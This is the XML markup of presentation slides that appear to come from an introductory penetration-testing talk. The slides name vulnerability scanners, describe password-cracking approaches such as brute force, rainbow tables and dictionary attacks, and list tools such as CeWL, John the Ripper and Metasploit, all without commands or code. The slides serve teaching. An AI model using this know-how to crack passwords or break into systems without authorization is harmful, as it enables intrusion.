        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;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t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Open Vulnerability Assessment System</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Framework for vulnerability scanning / management</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Made by German developer Greenbone Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Others also available:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Nessus by Tenable (commercial)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Nexpose by Rapid7 (commercial)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Used to be branch of Nessus before it went proprietary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Could compare results from all three scanners</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>There isn’t one that’s “better”... though Nessus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>arguably </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>has a better GUI</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="151" name="Google Shape;151;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3788900"/>
            <a:ext cx="2995875" cy="1132825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="152" name="Google Shape;152;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3064375" y="4033125"/>
            <a:ext cx="2709226" cy="733350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="153" name="Google Shape;153;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821625" y="3987068"/>
            <a:ext cx="2946025" cy="825450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="154" name="Google Shape;154;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="439049" y="1933299"/>
            <a:ext cx="254000" cy="152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Password and Hashes</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;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Most common way of authorization on a computer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Not stored in plaintext; uses a one-way </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>hash algorithm</a:t>
            </a:r>
            <a:endParaRPr u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Maps a variable value to a fixed value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Easy to create</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>...but impossible to reverse the hash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="161" name="Google Shape;161;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572998" y="2806750"/>
            <a:ext cx="3998000" cy="2195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Passwords and Hashes</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;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How to recover a password from a hash:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Try every possible combination until there’s a match. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>brute force.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have fun!!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>Rainbow tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - every possible hash is created and uses a fast searching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to match the hash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use a dictionary of plaintext passwords to see if one matches</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dictionary attack = much faster than brute force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Important to have a good word list. Kali has those!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="168" name="Google Shape;168;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8168875" y="1310950"/>
            <a:ext cx="663425" cy="663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Passwords and Hashes</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Google Shape;174;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t>CeWL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - custom word list generator</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Extracts words from websites to create a dictionary for password cracking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lots of unlikely passwords, but dictionary is still easier than brute force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Website often reflects internal terminology… embedded credentials?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>John the Ripper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - password recovery / cracker tool</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Popular, powerful</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Corresponds hash values with user passwords on system</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175" name="Google Shape;175;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6997412" y="3325574"/>
            <a:ext cx="1806125" cy="1639400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="176" name="Google Shape;176;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6968625" y="207213"/>
            <a:ext cx="1863676" cy="1048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AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation - Metasploit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;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Read: the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>actual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> hacking, and for some people the most fun part</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Identify weaknesses to allow unauthorized entry into systems</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - exploitation framework developed by Rapid7</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Bread and butter</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Essentially a huge database of scanners and exploitation modules to manipulate exploit and payload code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="183" name="Google Shape;183;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209479" y="319078"/>
            <a:ext cx="622821" cy="824600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="184" name="Google Shape;184;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6563750" y="3225391"/>
            <a:ext cx="2268552" cy="1276047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="185" name="Google Shape;185;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248725" y="3225400"/>
            <a:ext cx="1315025" cy="1276050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="186" name="Google Shape;186;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3053650"/>
            <a:ext cx="2429275" cy="1619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Overview</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3C78D8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;59;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What is Penetration Testing?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Information Gathering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Vulnerability Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Passwords and Hashes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Industry Examples</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Reports, certs, the business side, how to get into the field</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Google Shape;60;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5880969" y="154150"/>
            <a:ext cx="2875130" cy="1558275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Google Shape;61;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1259245">
            <a:off x="7366250" y="434030"/>
            <a:ext cx="794903" cy="594668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Google Shape;62;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-1960045">
            <a:off x="6360125" y="3894449"/>
            <a:ext cx="1562177" cy="849425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Google Shape;63;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7014025" y="3827190"/>
            <a:ext cx="1742076" cy="1161726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="Google Shape;64;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
